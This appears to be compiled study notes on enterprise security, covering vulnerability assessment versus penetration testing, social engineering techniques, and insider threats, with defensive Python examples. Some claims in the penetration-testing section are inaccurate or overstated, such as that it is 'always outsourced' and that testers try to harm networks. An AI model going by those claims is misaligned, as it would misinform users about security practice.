Prevention – This involves protecting networks from intruders by avoiding
security breaches. This is normally done by the implementation of firewalls.
Detection – This process focuses on the detection of the attacks and the
breaches that occur over the network.
Recovery – Once an attack occurs, recovery is essential for protecting the
information assets of the enterprise that may be damaged by the attack. For this,
some recovery mechanisms are employed by enterprises. To date, most of the
research and work has been done in the area of prevention and detection of
attacks.
Enterprise Information Security Architecture (EISA) can be a key component of an
information security program. The primary function of EISA is to document and communicate
the artifacts of the security program in a consistent manner. As such, the primary deliverable
of EISA is a set of documents connecting business drivers with technical
implementation guidance. These documents are developed iteratively through multiple levels
of abstraction.

Motives behind enterprise security

Enterprise security is getting difficult primarily due to the following reasons:
A. Increasing threats – Enterprise organizations are continuously attacked by newer
threats with the aim of stealing confidential information. Cybercriminals and hackers
are growing in large numbers. It has been reported that in recent years malware
attacks are worse than previous attacks. Further, crime is getting more sophisticated
these days. All these factors need to be managed.
B. Technology complexity – Security experts are dealing with threats while also
keeping up with the changes brought by new technologies like cloud computing, mobile
computing, the Internet of Things and virtualization. These new technologies are
creating gaps within the system which need to be addressed.
C. Legacy security procedures and techniques – In the past, many security techniques
have been used in enterprises, starting from firewalls, Intrusion Detection System/
Intrusion Prevention System (IDS/IPS), to host security software (i.e.,
antivirus software), and to security monitoring and compliance tools (i.e.,
SIEM, log management, etc.). These procedures are incapable of dealing with
the multidimensional threat.
Vulnerability Assessment
Vulnerability assessment is used to find out the vulnerabilities on the target
network. By using automatic scanning tools with some manual support,
vulnerabilities and threats can be identified. The tool categorizes these
vulnerabilities. When the vulnerabilities are classified, the security professional
prioritizes them and decides which vulnerability to patch first.
They decide whether they should reduce the risk level or remove the
weakness altogether. There are a lot of good tools on the market. A properly scoped
vulnerability scan can find out a lot about an environment, including common weaknesses
in applications, unapplied patches, gaps in network controls, and vulnerable software
versions. Using the vulnerability scanning tool, the security team can provide
recommendations on exactly how the vulnerabilities can be remediated with configuration
changes, patch management or hardening of the security infrastructure.

Vulnerability assessment Process
o Automated discovery of all assets is completed by the vulnerability
scanner within our environment.
o In the infrastructure, network and application, various vulnerabilities are
searched for and identified.
o The identified vulnerabilities are classified according to risk and priority.
o Vulnerabilities are remediated by the security professional with configuration
changes, patch management or hardening of the security infrastructure.
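The classification and prioritization steps of the process above, as an added example that is not from the notes or from any scanner vendor: a constructed scan export is banded by CVSS severity, re-scored against the value of the asset and the availability of a public exploit, and then grouped into the three remediation routes the notes name (configuration change, patch management, hardening). The JSON layout, host names and scores are assumptions made for the example.

```python
"""Triage of a vulnerability-scan export into a prioritised remediation plan.
The JSON export format, host names and scores below are constructed for this
example; they are not the output of any real scanner."""
import json

# Constructed scanner export (assumed format): one finding per object.
SCAN_EXPORT = json.dumps([
    {"host": "web-01", "asset_criticality": "high", "cvss": 7.5, "exploit_public": True,
     "kind": "missing_patch", "finding": "OpenSSL below vendor-patched version"},
    {"host": "web-01", "asset_criticality": "high", "cvss": 5.3, "exploit_public": False,
     "kind": "misconfiguration", "finding": "TLS 1.0 enabled"},
    {"host": "db-02", "asset_criticality": "critical", "cvss": 6.5, "exploit_public": False,
     "kind": "missing_control", "finding": "Database port reachable from user VLAN"},
    {"host": "kiosk-07", "asset_criticality": "low", "cvss": 8.8, "exploit_public": True,
     "kind": "missing_patch", "finding": "Browser below vendor-patched version"},
    {"host": "print-03", "asset_criticality": "low", "cvss": 4.3, "exploit_public": False,
     "kind": "misconfiguration", "finding": "SNMP default community string"},
])

# How much a finding matters depends on the asset it sits on, not only on CVSS.
CRITICALITY_WEIGHT = {"low": 1.0, "medium": 1.5, "high": 2.0, "critical": 3.0}

# The three remediation routes named in the notes, keyed by finding kind.
REMEDIATION = {
    "missing_patch": "patch management: apply vendor update",
    "misconfiguration": "configuration change",
    "missing_control": "hardening of security infrastructure",
}


def severity_band(cvss):
    """Qualitative band for a CVSS v3 base score (standard CVSS rating scale)."""
    if cvss == 0.0:
        return "None"
    if cvss < 4.0:
        return "Low"
    if cvss < 7.0:
        return "Medium"
    if cvss < 9.0:
        return "High"
    return "Critical"


def risk_score(finding):
    """Scanner severity adjusted for asset value and public exploit availability."""
    score = finding["cvss"] * CRITICALITY_WEIGHT[finding["asset_criticality"]]
    if finding["exploit_public"]:
        score *= 1.5
    return round(score, 1)


def triage(export_json):
    """Classify every finding, then rank the list so the riskiest comes first."""
    findings = json.loads(export_json)
    for f in findings:
        f["severity"] = severity_band(f["cvss"])
        f["risk"] = risk_score(f)
        f["action"] = REMEDIATION.get(f["kind"], "manual review")
    return sorted(findings, key=lambda f: f["risk"], reverse=True)


def remediation_plan(ranked):
    """Group ranked findings by the kind of fix that has to be scheduled."""
    plan = {}
    for f in ranked:
        plan.setdefault(f["action"], []).append((f["host"], f["finding"], f["severity"], f["risk"]))
    return plan


if __name__ == "__main__":
    ranked = triage(SCAN_EXPORT)
    for f in ranked:
        print(f"{f['risk']:5} {f['severity']:<8} {f['host']:<9} {f['finding']} -> {f['action']}")
    for action, items in remediation_plan(ranked).items():
        print(action, [h for h, *_ in items])
```

The kiosk's CVSS 8.8 "High" finding ranks below a 6.5 "Medium" on the critical database host, which is the point of prioritizing by risk rather than by raw scanner severity.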

Penetration testing
Penetration testing is used to find out the vulnerabilities of a particular
network. Penetration testing determines whether a vulnerability is genuine or not. A
vulnerability is considered genuine and is reflected in the report if a penetration
tester exploits a potentially vulnerable spot. If they are unable to exploit the spot,
the report shows it as an unexploitable theoretical vulnerability. Attempting to
exploit theoretical vulnerabilities can lead to DoS, meaning it threatens the
network, so exploiting theoretical vulnerabilities is not a good idea. A penetration
tester tries to harm a customer's network by installing malicious software on the
customer's computer, taking down the server, or gaining unauthorized access to the
customer's system. This step is not included in a vulnerability assessment.

Penetration testing process
o Gathering the open-source intelligence
o Scanning and discovering
o Identify the vulnerabilities
o Attack phase
o Risk analysis
o Send report

Differences between Vulnerability Assessment and
Penetration Testing
Vulnerability scanning and penetration testing are different from each
other. Penetration testing can exploit the vulnerabilities, while a vulnerability scan
identifies and ranks vulnerabilities and reports them. The differences between
vulnerability assessment and penetration testing are as follows:

Breadth vs. Depth
Vulnerability coverage (breadth and depth) is the main difference
between penetration testing and vulnerability assessment.

Vulnerability assessment detects as many security weaknesses as possible. It is
the breadth-over-depth approach. To maintain the security status of the network,
it should be employed regularly, especially when ports are opened, new services
are added, and new equipment is installed.

Penetration testing is used when the customer asserts that the security defense of
their network is strong, but they want to check whether they are hack-proof. It is
the depth over breadth approach.

The automation degree
Vulnerability assessment allows a wider coverage of vulnerability. It is
usually automated.

Penetration testing helps to dig deeper into the weakness. It is a combination
of manual and automated techniques.

Choice of professional
In the vulnerability assessment, automated testing does not require high skills.
Security department members can also perform it. However, the security employees
of a company may find some vulnerabilities but be unable to include them in the report,
so a third-party vulnerability assessment vendor may have more information.
To perform penetration testing, a high level of expertise is required, so
penetration testing is always outsourced to a service provider.

Choice of Vendors
The differences between penetration testing and vulnerability assessment show that both
forms of security testing are essential to guarding the security of a network.

Vulnerability assessment is used to maintain security.

Penetration testing discovers the weaknesses of security.

Taking advantage of penetration testing and vulnerability assessment is possible
only if you hire a high-quality vendor who has the ability to understand pen testing and
vulnerability assessment. But most importantly, the vendor should have the ability
to explain the difference between vulnerability assessment and pen testing to the
customer.

10 Types of Social Engineering Attacks

To prevent a social engineering attack, you need to understand what they
look like and how you might be targeted. These are the 10 most common
types of social engineering attacks to be aware of.

1. Phishing
Phishing is the most common type of social engineering attack, typically
using spoofed email addresses and links to trick people into providing login
credentials, credit card numbers, or other personal information. Variations of
phishing attacks include:
• Angler phishing – using spoofed customer service accounts on social
media
• Spear phishing – phishing attacks that target specific organizations or
individuals

2. Whaling
Whaling is another common variation of phishing that specifically targets
top-level business executives and the heads of government agencies. Whaling
attacks usually spoof the email addresses of other high-ranking people in the
company or agency and contain urgent messaging about a fake emergency or
time-sensitive opportunity. Successful whaling attacks can expose a lot of
confidential, sensitive information due to the high-level network access these
executives and directors have.

3. Diversion Theft
In an old-school diversion theft scheme, the thief persuades a delivery driver
or courier to travel to the wrong location or hand off a parcel to someone
other than the intended recipient. In an online diversion theft scheme, a thief
steals sensitive data by tricking the victim into sending it to or sharing it with
the wrong person. The thief often accomplishes this by spoofing the email
address of someone in the victim’s company—an auditing firm or a financial
institution, for example.


4. Baiting
Baiting is a type of social engineering attack that lures victims into providing
sensitive information or credentials by promising something of value for free.
For example, the victim receives an email that promises a free gift card if
they click a link to take a survey. The link might redirect them to a spoofed
Office 365 login page that captures their email address and password and
sends them to a malicious actor.

5. Honey Trap
In a honey trap attack, the perpetrator pretends to be romantically or sexually
interested in the victim and lures them into an online relationship. The
attacker then persuades the victim to reveal confidential information or pay
them large sums of money.

6. Pretexting
Pretexting is a fairly sophisticated type of social engineering attack in which
a scammer creates a pretext or fabricated scenario—pretending to be an IRS
auditor, for example—to con someone into providing sensitive personal or
financial information, such as their social security number. In this type of
attack, someone can also physically acquire access to your data by pretending
to be a vendor, delivery driver, or contractor to gain your staff’s trust.


7. SMS Phishing
SMS phishing is becoming a much larger problem as more organizations
embrace texting as a primary method of communication. In one method of
SMS phishing, scammers send text messages that spoof multi-factor
authentication requests and redirect victims to malicious web pages that
collect their credentials or install malware on their phones.

8. Scareware
Scareware is a form of social engineering in which a scammer inserts
malicious code into a webpage that causes pop-up windows with flashing
colors and alarming sounds to appear. These pop-up windows will falsely
alert you to a virus that’s been installed on your system. You’ll be told to
purchase and download their security software, and the scammers will either
steal your credit card information, install real viruses on your system, or
(most likely) both.

9. Tailgating/Piggybacking
Tailgating, also known as piggybacking, is a social engineering tactic in
which an attacker physically follows someone into a secure or restricted area.
Sometimes the scammer will pretend they forgot their access card, or they’ll
engage someone in an animated conversation on their way into the area so
their lack of authorized identification goes unnoticed.
10. Watering Hole
In a watering hole attack, a hacker infects a legitimate website that their
targets are known to visit. Then, when their chosen victims log into the site,
the hacker either captures their credentials and uses them to breach the
target’s network, or they install a backdoor trojan to access the network.

What is Insider Attack?
Cyber attacks are attacks on cyber networks involving the internet, carried out
by professional cyber-hacking experts. The main motivation driving the
growth in cyber crime is ever-growing internet dependency. Over the
years, the use of computer networks connected to the internet has increased
enormously. Cyber criminals have taken advantage of this increasing demand
for internet-related services to exploit the privacy of users and organisations
that use computer networks to store their private information, among the
many other advantages of using the internet.
Here, in this article, we will discuss a very risky form of cyber attack, insider
attacks, in detail.
Although many symmetric and asymmetric key-based techniques exist for secure
communication, they do not help if a person with privileged access can reach the
stored credentials of users; the system should be robust in that scenario as well.
Security breaches raise the risk of vulnerabilities being exploited by attackers. Cyber
criminals aim at breaching security loopholes to enter the computer system and execute
their malicious intent of stealing private user information. Access to
confidential information by unauthorised individuals is a serious form of crime
and is not accepted by law under any circumstances. Cyber crimes are thus
regarded as very dangerous in nature and must be prevented in every
aspect. Cyber attacks can be prevented by proper knowledge
of cyber attacks and facts about different cyber security techniques.
Insider Attack:
• Insider attacks get their name because they are attacks caused by people who have
inside access to information.
• The inside people may be current or former employees, business partners,
contractors, or security admins who previously had access to the confidential
information.
• Insider attacks are carried out by people who are familiar with the
computer network system and hold authorised access to all the
information.
• This form of cyber attack is extremely dangerous as the attack is led by the
system's own employees, which makes the entire process extremely vulnerable.
• Organisations most likely focus on protection against external cyber attacks
and rarely have their attention focused on internal cyber attacks.
Insider Types:
• Malicious Insider: Someone who maliciously and intentionally misuses
legitimate credentials, usually stealing information for financial or
personal incentives. For example, someone who has a score to settle with a
former employer, or an opportunistic employee who sells sensitive
information to competitors.
• Careless Insider: An insider who unknowingly exposes your system to
external threats. This is the most common type of insider threat, caused by
mistakes such as leaving a device unprotected or falling victim to fraud. For
example, a harmless employee could click on an insecure link and infect a
system with malware.
• Mole: A scammer who is technically an outsider but has gained insider
access to a privileged network. This is an outsider to the organisation who
poses as an employee or partner.

Threat Indicators:
• Activity at unusual times: signing in to the network after working hours.
• The volume of traffic: transferring too much data via the network of the
company.
• The type of activity: accessing unusual resources.
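The three indicators above turned into detection logic, as an added example that is not part of the notes: a constructed access log is checked for sign-ins outside business hours, for per-user daily data volume above a ceiling, and for access to resources outside each user's normal baseline, then summarised per user. The record format, the business-hours window, the byte limit and the baseline are assumptions made for the example.

```python
"""Flag the three insider-threat indicators listed above over constructed log
records. The record format (timestamp user action resource bytes), the
business-hours window, the daily byte limit and the per-user baseline of
normal resources are assumptions for this example."""
from collections import defaultdict
from datetime import datetime

# Constructed access log: ISO timestamp, user, action, resource, bytes moved.
LOG = """\
2024-03-04T09:12:03 alice LOGIN vpn 0
2024-03-04T09:40:11 alice READ crm/accounts 20480
2024-03-04T10:05:44 bob LOGIN vpn 0
2024-03-04T10:30:00 bob READ hr/payroll 4096
2024-03-04T22:47:19 alice LOGIN vpn 0
2024-03-04T22:50:02 alice READ hr/payroll 8192
2024-03-04T23:10:55 alice DOWNLOAD fileshare/finance 734003200
2024-03-05T11:00:00 bob READ hr/payroll 2048
"""

BUSINESS_HOURS = range(8, 19)            # 08:00-18:59, assumed working day
DAILY_BYTES_LIMIT = 500 * 1024 * 1024    # assumed per-user, per-day ceiling
# Assumed baseline: resources each user touches in a normal week.
BASELINE = {"alice": {"vpn", "crm/accounts"}, "bob": {"vpn", "hr/payroll"}}


def parse(log_text):
    records = []
    for line in log_text.splitlines():
        ts, user, action, resource, nbytes = line.split()
        records.append({"ts": datetime.fromisoformat(ts), "user": user,
                        "action": action, "resource": resource, "bytes": int(nbytes)})
    return records


def after_hours_logins(records):
    """Indicator 1: sign-ins outside the business-hours window."""
    return [r for r in records
            if r["action"] == "LOGIN" and r["ts"].hour not in BUSINESS_HOURS]


def excessive_volume(records, limit=DAILY_BYTES_LIMIT):
    """Indicator 2: bytes moved per user per day above the limit."""
    totals = defaultdict(int)
    for r in records:
        totals[(r["user"], r["ts"].date().isoformat())] += r["bytes"]
    return sorted((u, d, n) for (u, d), n in totals.items() if n > limit)


def unusual_resources(records, baseline):
    """Indicator 3: access to resources outside the user's baseline."""
    return [r for r in records if r["resource"] not in baseline.get(r["user"], set())]


def indicators(records, baseline):
    """Per-user report; a user with several indicator types warrants review first."""
    report = defaultdict(dict)
    for r in after_hours_logins(records):
        report[r["user"]].setdefault("after_hours", []).append(r["ts"].isoformat())
    for user, day, total in excessive_volume(records):
        report[user].setdefault("volume", []).append(f"{total} bytes on {day}")
    for r in unusual_resources(records, baseline):
        report[r["user"]].setdefault("unusual_resource", []).append(r["resource"])
    return dict(report)


if __name__ == "__main__":
    for user, hits in indicators(parse(LOG), BASELINE).items():
        print(user, hits)
```

No single indicator is proof of anything; the same user tripping all three on one evening is what should raise the alert, which is why the report is keyed per user rather than per event.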

Risk Analysis:

• An insider can become an adversary at any time and perform the security attacks
described in the threat models.
• If an adversary (attacker) can find out a long-term key value in a
polynomial amount of time, the scenario becomes even more hazardous to
the system.
• There are many protocols in which the password fields of users
are not stored in an encrypted format; in that case an insider can find out the
password patterns of the users and sell them to attackers, which can lead to a
password guessing attack with high probability.
How can you prevent insider threats when none of your insiders are actually “inside”?
Security teams can be so focused on blocking cyberattacks from outside that they turn
a blind eye to potential threats within their own organizations.

In fact, 34% of all breaches are caused by insider threats.

Insider threats are uniquely difficult to defend against because insiders inherently
require an elevated level of trust and access to get their jobs done. For example,
system administrators and other IT professionals may have a legitimate need to access
sensitive systems and data. But can that trust be used as a cover?

Breaches caused by malicious hackers took even longer to identify and contain
Insider attacks remained undetected for an average of 207 days in 2019, with a mean
time to contain 73 days. In 2019, breaches caused by malicious cybercriminals took
even longer to identify and contain—314 days—with an average cost of more than
$1.6 million.

Despite the challenges, you can effectively defend against insider threats. In fact, as
I’ll explore in this blog, many of the most infamous insider attacks could have been
prevented with the right combination of policies, training, systems, and oversight.


What are insider threats?
Insider threats take many forms. Some are malicious actors looking for financial gain.
Others are simply careless or unsuspecting employees who click an email link, only to
unleash a torrent of malware. Insider attacks may be performed by people unwittingly
lured into committing bad behavior.

The Verizon Data Breach Investigations Report (DBIR) explains insider threats this
way: “An insider threat can be defined as what happens when someone close to an
organization, with authorized access, misuses that access to negatively impact the
organization’s critical information or systems.”

By extension, “insiders” aren’t exclusively people who work for your organization
directly. Insiders include consultants, third-party contractors, vendors, and anyone
who has legitimate access to some of your resources.

The Verizon Insider Threat Report defines five categories of actors behind
insider threats:

1. The Careless Worker: An employee/partner who performs inappropriate
actions that aren’t intentionally malicious. They’re often looking for ways to
get their jobs done, but in the process misuse assets, don’t follow acceptable
use policies, and install unauthorized or dubiously sourced applications.
2. The Feckless Third Party: A partner who compromises security through
negligence, misuse, or malicious access to or use of an asset. Sometimes it’s
intentional and malicious; sometimes it’s just due to carelessness. For example,
a system administrator might misconfigure a server or database, making it open
to the public rather than private and access-controlled, inadvertently exposing
sensitive information.
3. The Insider Agent: A compromised insider either recruited, bribed, or
solicited by a third party to exfiltrate information and data. People under
financial stress are prime targets, as are conscientious objectors who disagree
with the corporate mission.
4. The Disgruntled Employee: A jilted or maligned employee who is motivated
to bring down an organization from the inside by disrupting the business and
destroying or altering data.
5. The Malicious Insider: A person with legitimate privileged access to
corporate assets, looking to exploit it for personal gain, often by stealing and
repurposing the information.

Insider threat examples: There are plenty of examples of each type of inside actor,
from conspirators (American Superconductor) to malicious insiders looking for
financial gain (Otto), to conscientious objectors (Edward Snowden), to careless or
unwitting actors.
I’ll delve into those case studies shortly, but first, let’s talk about the broad impact of
insider attacks.

Impact of insider attacks


Columbia University researchers surveyed the most common types of insider threat
activities. The list ranges from seemingly innocuous actions taken by individuals to
intentionally illegal activities:

• Unsanctioned removal, copying, transfer, or other forms of data exfiltration
• Misusing organizational resources for non-business related or unauthorized
activities
• Data tampering, such as unsanctioned changes to data
• Deletion or destruction of sensitive assets
• Downloading information from dubious sources
• Using pirated software that might contain malware or other malicious code
• Network eavesdropping and packet sniffing
• Spoofing and illegally impersonating other people
• Devising or executing social engineering attacks
• Purposefully installing malicious software

Whether the damage is caused intentionally or accidentally, the consequences of
insider attacks are very real.

Preventing insider attacks is getting more difficult


The attack surface has been evolving, making it increasingly difficult to detect and
prevent insider attacks. The prevalence of BYOD, the proliferation of SaaS tools and
applications, and the migration of data to the cloud have changed the nature of the
corporate perimeter. The variety, breadth, and dispersed nature of access points make
it harder for you to control the security environment and give attackers the upper hand
in hiding their tracks.

These changes have cybersecurity experts and IT departments concerned that users
accessing systems outside the corporate perimeter increase the likelihood of data
leakage.

It’s not only that there are more devices used to access the corporate network; it’s that
so many of the phones and laptops are unsecured, making it harder for you to detect
rogue devices within the forest of benign ones.

On average, nearly a quarter of all employees are privileged users. Privileged users
have access to a wider array of sensitive systems and data than standard users. Some
privileged users may have a legitimate need for that increased access. But not
everyone does. When so many insiders have elevated privileges, it’s hard to
differentiate between legitimate and aberrant behavior.
These days, during the COVID-19 pandemic, there are many more “insiders” working
outside of an organization. People working remotely expect and need the same access
to systems that they have while in the office. Yet, IT teams have less visibility and
control, which increases the risk of insider threats.

In some organizations, employees are being let go. When this happens quickly, proper
off-boarding protocols and processes may be forgotten. Privileged accounts may
remain enabled, employees may retain company-issued laptops, and passwords may
not be changed or disabled as they should. Gaps like these give former employees the
opportunity to steal IP, plant malware, and exact revenge.

As all of these risk factors increase, insiders (and the criminals who stalk them) have
become more sophisticated in their use of technology, their ability to cover their
tracks, and to navigate corporate networks surreptitiously.

That said, it’s possible to detect insider threats before they cause damage. First, let’s
explore some high-profile insider threats from the past few years. Then, I’ll cover how
these types of breaches could have been discovered and possibly prevented.
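
The off-boarding gaps described above (privileged accounts left enabled, departed users still logging in) are the kind of thing a defender can check mechanically. The script below is an added example, not part of the original notes: it reconciles a constructed HR off-boarding list against a constructed directory snapshot and constructed authentication log lines; usernames, dates and the log format are assumptions.

```python
"""
Added example, not part of the original notes: reconcile an HR off-boarding
list against a directory snapshot and authentication logs to surface the gaps
described above (privileged accounts left enabled after an employee leaves,
and logins by accounts that should already be disabled).
Every record below is constructed for the example; usernames, dates and the
log line format are assumptions, not any organization's real data.
"""
from dataclasses import dataclass
from datetime import date, datetime

# Constructed HR off-boarding records: username -> date the account should
# have been disabled.
TERMINATED = {
    "jdoe": date(2024, 3, 1),
    "asmith": date(2024, 3, 5),
}

# Constructed directory snapshot: username -> (enabled, privileged).
ACCOUNTS = {
    "jdoe": (True, True),      # left 1 March, still enabled and still privileged
    "asmith": (False, False),  # correctly disabled at off-boarding
    "bwong": (True, True),     # current employee
}

# Constructed auth log in an assumed "timestamp user result source" format.
AUTH_LOG = """\
2024-03-02T08:12:44 jdoe SUCCESS vpn-gw1
2024-03-02T09:01:10 bwong SUCCESS vpn-gw1
2024-03-06T22:40:03 asmith FAILURE vpn-gw1
2024-03-07T01:15:59 jdoe SUCCESS fileserver
"""


@dataclass(frozen=True)
class Finding:
    user: str
    kind: str    # "enabled_after_termination" or "login_after_termination"
    detail: str


def stale_accounts(accounts, terminated):
    """Off-boarded users whose account is still enabled; privileged ones are flagged."""
    findings = []
    for user, left_on in terminated.items():
        enabled, privileged = accounts.get(user, (False, False))
        if enabled:
            level = "PRIVILEGED" if privileged else "standard"
            findings.append(Finding(user, "enabled_after_termination",
                                    f"{level} account still enabled; user left {left_on}"))
    return findings


def logins_after_termination(log_text, terminated):
    """Successful logins by off-boarded users on or after their disable date."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        stamp, user, result, source = line.split()
        left_on = terminated.get(user)
        if left_on is None or result != "SUCCESS":
            continue  # current employee, or a failed attempt (track separately)
        if datetime.fromisoformat(stamp).date() >= left_on:
            findings.append(Finding(user, "login_after_termination",
                                    f"successful login from {source} at {stamp}"))
    return findings


def review(accounts, log_text, terminated):
    """Combined off-boarding review; each Finding is one gap to close."""
    return (stale_accounts(accounts, terminated)
            + logins_after_termination(log_text, terminated))


if __name__ == "__main__":
    for f in review(ACCOUNTS, AUTH_LOG, TERMINATED):
        print(f"{f.kind:28} {f.user:8} {f.detail}")
```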

Social Engineering Targets and Defense Strategies


What is social engineering?

Social engineering is the term used for a broad range of malicious activities
accomplished through human interactions. It uses psychological manipulation
to trick users into making security mistakes or giving away sensitive
information.

Social engineering attacks happen in one or more steps. A perpetrator first
investigates the intended victim to gather necessary background information,
such as potential points of entry and weak security protocols, needed to
proceed with the attack. Then, the attacker moves to gain the victim’s trust
and provide stimuli for subsequent actions that break security practices, such
as revealing sensitive information or granting access to critical resources.

Figure: Social Engineering Attack Lifecycle

What makes social engineering especially dangerous is that it relies on
human error, rather than vulnerabilities in software and operating systems.
Mistakes made by legitimate users are much less predictable, making them
harder to identify and thwart than a malware-based intrusion.

Social engineering attack techniques

Social engineering attacks come in many different forms and can be
performed anywhere where human interaction is involved. The following are
the five most common forms of digital social engineering assaults.

Baiting

As its name implies, baiting attacks use a false promise to pique a victim’s
greed or curiosity. They lure users into a trap that steals their personal
information or inflicts their systems with malware.

The most reviled form of baiting uses physical media to disperse malware.
For example, attackers leave the bait—typically malware-infected flash
drives—in conspicuous areas where potential victims are certain to see them
(e.g., bathrooms, elevators, the parking lot of a targeted company). The bait
has an authentic look to it, such as a label presenting it as the company’s
payroll list.
Victims pick up the bait out of curiosity and insert it into a work or home
computer, resulting in automatic malware installation on the system.

Baiting scams don’t necessarily have to be carried out in the physical world.
Online forms of baiting consist of enticing ads that lead to malicious sites or
that encourage users to download a malware-infected application.

Scareware

Scareware involves victims being bombarded with false alarms and fictitious
threats. Users are deceived to think their system is infected with malware,
prompting them to install software that has no real benefit (other than for the
perpetrator) or is malware itself. Scareware is also referred to as deception
software, rogue scanner software and fraudware.

A common scareware example is the legitimate-looking popup banners
appearing in your browser while surfing the web, displaying text such
as, “Your computer may be infected with harmful spyware programs.” It
either offers to install the tool (often malware-infected) for you, or will direct
you to a malicious site where your computer becomes infected.

Scareware is also distributed via spam email that doles out bogus warnings,
or makes offers for users to buy worthless/harmful services.

Pretexting

Here an attacker obtains information through a series of cleverly crafted lies.
The scam is often initiated by a perpetrator pretending to need sensitive
information from a victim so as to perform a critical task.

The attacker usually starts by establishing trust with their victim by
impersonating co-workers, police, bank and tax officials, or other persons
who have right-to-know authority. The pretexter asks questions that are
ostensibly required to confirm the victim’s identity, through which they
gather important personal data.

All sorts of pertinent information and records are gathered using this scam,
such as social security numbers, personal addresses and phone numbers,
phone records, staff vacation dates, bank records and even security
information related to a physical plant.

Phishing

As one of the most popular social engineering attack types, phishing scams
are email and text message campaigns aimed at creating a sense of urgency,
curiosity or fear in victims. It then prods them into revealing sensitive
information, clicking on links to malicious websites, or opening attachments
that contain malware.

An example is an email sent to users of an online service that alerts them of a
policy violation requiring immediate action on their part, such as a required
password change. It includes a link to an illegitimate website—nearly
identical in appearance to its legitimate version—prompting the unsuspecting
user to enter their current credentials and new password. Upon form
submittal the information is sent to the attacker.

Given that identical, or near-identical, messages are sent to all users in
phishing campaigns, detecting and blocking them is much easier for mail
servers that have access to threat sharing platforms.

Spear phishing

This is a more targeted version of the phishing scam whereby an attacker
chooses specific individuals or enterprises. They then tailor their messages
based on characteristics, job positions, and contacts belonging to their victims
to make their attack less conspicuous. Spear phishing requires much more
effort on behalf of the perpetrator and may take weeks and months to pull off.
They’re much harder to detect and have better success rates if done skillfully.

A spear phishing scenario might involve an attacker who, in impersonating
an organization’s IT consultant, sends an email to one or more employees.
It’s worded and signed exactly as the consultant normally does, thereby
deceiving recipients into thinking it’s an authentic message. The message
prompts recipients to change their password and provides them with a link
that redirects them to a malicious page where the attacker now captures their
credentials.

Social engineering prevention

Social engineers manipulate human feelings, such as curiosity or fear, to
carry out schemes and draw victims into their traps. Therefore, be wary
whenever you feel alarmed by an email, attracted to an offer displayed on a
website, or when you come across stray digital media lying about. Being alert
can help you protect yourself against most social engineering attacks taking
place in the digital realm.

Moreover, the following tips can help improve your vigilance in relation to
social engineering hacks.

• Don’t open emails and attachments from suspicious sources – If you don’t
know the sender in question, you don’t need to answer an email. Even if you
do know them and are suspicious about their message, cross-check and
confirm the news from other sources, such as via telephone or directly from a
service provider’s site. Remember that email addresses are spoofed all of the
time; even an email purportedly coming from a trusted source may have
actually been initiated by an attacker.
• Use multifactor authentication – One of the most valuable pieces of
information attackers seek are user credentials. Using multifactor
authentication helps ensure your account’s protection in the event of system
compromise. Imperva Login Protect is an easy-to-deploy 2FA solution that
can increase account security for your applications.
• Be wary of tempting offers – If an offer sounds too enticing, think twice
before accepting it as fact. Googling the topic can help you quickly determine
whether you’re dealing with a legitimate offer or a trap.
• Keep your antivirus/antimalware software updated – Make sure
automatic updates are engaged, or make it a habit to download the latest
signatures first thing each day. Periodically check to make sure that the
updates have been applied, and scan your system for possible infections.
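
The first tip warns that sender addresses are spoofed all the time. On the receiving side there is header evidence a mail server or analyst can check, and the script below is an added example (not part of the original notes) of doing so with Python's standard email library: it compares the From: domain with the envelope Return-Path and reads the SPF, DKIM and DMARC verdicts the receiving server recorded in Authentication-Results. Both messages and the receiving host name "mx.example.net" are constructed for the example.

```python
"""
Added example, not from the original notes: flag the spoofing indicators
behind a phishing message using only the headers a receiving mail server
already records. Messages and the authserv-id "mx.example.net" are constructed.
"""
import email
import re
from email.utils import parseaddr

# Constructed phishing message: the From: domain does not match the envelope
# sender, and the receiving server recorded SPF and DMARC failures.
SPOOFED_MESSAGE = """\
Return-Path: <bounce@mail-delivery.test>
Authentication-Results: mx.example.net; spf=fail smtp.mailfrom=mail-delivery.test; dkim=none; dmarc=fail header.from=bank.example
From: "Your Bank" <alerts@bank.example>
To: victim@example.net
Subject: Policy violation - password change required

Please log in within 24 hours to keep your account active.
"""

# Constructed legitimate message: aligned domains, all three checks pass.
CLEAN_MESSAGE = """\
Return-Path: <alerts@bank.example>
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=bank.example; dkim=pass header.d=bank.example; dmarc=pass header.from=bank.example
From: "Your Bank" <alerts@bank.example>
To: customer@example.net
Subject: Your monthly statement is ready

Your statement is available in online banking.
"""


def domain_of(header_value):
    """Lowercase domain part of an address header such as From: or Return-Path:."""
    _, addr = parseaddr(header_value or "")
    return addr.rpartition("@")[2].lower()


def parse_auth_results(value):
    """Turn 'authserv; spf=fail ...; dkim=none; dmarc=fail ...' into a dict."""
    results = {}
    for clause in value.split(";")[1:]:        # clause 0 is the authserv-id
        m = re.match(r"\s*(spf|dkim|dmarc)=(\w+)", clause)
        if m:
            results[m.group(1)] = m.group(2).lower()
    return results


def spoofing_indicators(raw_message):
    """Human-readable reasons the message looks spoofed; empty if none found."""
    msg = email.message_from_string(raw_message)
    reasons = []

    # 1. Envelope sender vs. displayed sender: phishing kits often differ here.
    from_dom = domain_of(msg.get("From"))
    rp_dom = domain_of(msg.get("Return-Path"))
    if from_dom and rp_dom and from_dom != rp_dom:
        reasons.append(f"From domain {from_dom} differs from Return-Path domain {rp_dom}")

    # 2. Verdicts recorded by the receiving server.
    auth = parse_auth_results(msg.get("Authentication-Results", ""))
    for mech in ("spf", "dkim", "dmarc"):
        if auth.get(mech) in ("fail", "softfail", "permerror"):
            reasons.append(f"{mech} result is {auth[mech]}")

    # 3. An unsigned message that did not pass DMARC has no proof of origin.
    if auth.get("dkim") == "none" and auth.get("dmarc") != "pass":
        reasons.append("no DKIM signature and DMARC did not pass")
    return reasons


if __name__ == "__main__":
    for name, raw in (("spoofed", SPOOFED_MESSAGE), ("clean", CLEAN_MESSAGE)):
        print(name, spoofing_indicators(raw))
```

A positive result is a reason to treat the message as untrusted, not proof on its own: mailing lists and forwarders also break SPF alignment, which is why the original advice to confirm with the sender out of band still stands.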

Top 10 Ways to Prevent Social Engineering Attacks

1. Multi-Factor Authentication

Don’t rely on one factor. The most basic preventive measure is securing your
accounts with more than a password. A password provides some security, but
passwords have proved inadequate on their own, because it is far easier for someone
else to guess your password and obtain access to your accounts.

Passwords can also be obtained through social engineering. Multi-factor verification
is therefore required; the additional factor could be anything from biometric access
